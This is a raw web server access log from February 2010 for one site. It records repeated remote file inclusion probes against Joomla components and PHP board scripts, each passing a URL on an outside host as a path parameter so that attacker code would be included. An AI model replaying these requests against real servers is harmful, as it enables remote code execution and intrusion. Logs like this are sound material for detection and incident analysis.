218.38.136.126 - - [10/Feb/2010:04:29:06 -0800] "GET /logs/access_100104.log%20%20//bbs2//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:29:09 -0800] "GET /bbs2//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:29:09 -0800] "GET /logs//bbs2//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [10/Feb/2010:04:29:09 -0800] "GET /logs/access_100104.log%20%20//bbs2//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:32:08 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:04:32:09 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
69.175.7.90 - - [10/Feb/2010:04:32:10 -0800] "GET /logs/access_100201.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:34:40 -0800] "GET /logs/access_100114.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:34:40 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:34:40 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:34:47 -0800] "GET /logs/access_100114.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:34:47 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:34:47 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:34:58 -0800] "GET /logs/access_100201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:34:59 -0800] "GET /logs/access_100114.log%20%20//searcharrays.php?addonDir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:34:59 -0800] "GET /searcharrays.php?addonDir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:34:59 -0800] "GET /logs//searcharrays.php?addonDir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:35:00 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:35:00 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:35:00 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:35:00 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:35:00 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:35:04 -0800] "GET /logs/access_100201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:35:05 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:35:57 -0800] "GET /logs/access_100114.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:35:57 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:35:57 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:36:04 -0800] "GET /logs/access_100114.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:36:04 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:36:04 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:04:36:07 -0800] "GET /logs/access_100120.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:04:36:07 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:04:36:07 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:36:11 -0800] "GET /logs/access_100201.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:36:20 -0800] "GET /logs/access_100201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:36:29 -0800] "GET /logs/access_100201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:36:34 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:36:34 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:36:34 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:13 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:13 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:13 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:13 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:13 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:13 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:30 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:37:31 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:22 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:22 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:22 -0800] "GET /logs/access_100123.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:22 -0800] "GET /logs/access_100119.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:38:22 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:38:22 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:38:22 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:25 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:25 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:25 -0800] "GET /logs/access_100106.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:38:29 -0800] "GET /logs/access_100114.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:38:29 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:38:30 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:38:34 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:44 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:44 -0800] "GET /logs/access_100123.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:38:44 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:38:49 -0800] "GET /logs/access_100114.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:38:49 -0800] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4950 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:38:50 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:39:00 -0800] "GET /logs/access_100201.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:39:12 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:39:12 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:39:14 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:39:22 -0800] "GET /logs/access_100121.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:39:27 -0800] "GET /logs/access_100123.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.192.48.157 - - [10/Feb/2010:04:39:41 -0800] "GET /logs/access_100203.log/write_update.php?board_skin_path=http://fastbilly.com/tour/build.url??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.192.48.157 - - [10/Feb/2010:04:39:42 -0800] "GET /write_update.php?board_skin_path=http://fastbilly.com/tour/build.url??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
67.192.48.157 - - [10/Feb/2010:04:39:42 -0800] "GET /logs/write_update.php?board_skin_path=http://fastbilly.com/tour/build.url??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:39:51 -0800] "GET /logs/access_100201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.76.100 - - [10/Feb/2010:04:39:58 -0800] "GET /logs/access_100201.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:40:17 -0800] "GET /logs/access_100123.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:40:17 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:40:17 -0800] "GET /logs/access_100119.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [10/Feb/2010:04:40:17 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:40:22 -0800] "GET /dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:40:22 -0800] "GET /logs/access_100127.log//dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:40:22 -0800] "GET /logs/access_100103.log//dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:40:22 -0800] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [10/Feb/2010:04:40:52 -0800] "GET /logs/access_100206.log HTTP/1.0" 200 2163814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:41:26 -0800] "GET /logs/access_100127.log//dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:41:27 -0800] "GET /logs/access_100103.log//dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:41:27 -0800] "GET /logs//dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:41:27 -0800] "GET /dm-albums/template/album.php?SECURITY_FILE=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:41:44 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:41:44 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:41:44 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:41:45 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:41:45 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:41:45 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.96.161 - - [10/Feb/2010:04:41:54 -0800] "GET /logs/access_100114.log//searcharrays.php?addonDir=http://files.sign.io/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.192.48.157 - - [10/Feb/2010:04:42:01 -0800] "GET /logs/access.log/write_update.php?board_skin_path=http://fastbilly.com/tour/build.url??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:43:13 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:43:22 -0800] "GET /logs/access_100114.log/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:43:38 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [10/Feb/2010:04:44:02 -0800] "GET /logs/access_100117.log%20%20//include/admin.lib.inc.php?site_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:44:07 -0800] "GET /logs/access_100114.log/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:44:07 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:44:07 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:44:08 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:44:08 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:04:44:10 -0800] "GET /bbs/write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:44:11 -0800] "GET /logs/access_100120.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [10/Feb/2010:04:44:23 -0800] "GET /logs/access_100201.log/////?_SERVER[DOCUMENT_ROOT]=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:44:41 -0800] "GET /logs/access_100120.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:44:41 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:04:44:41 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
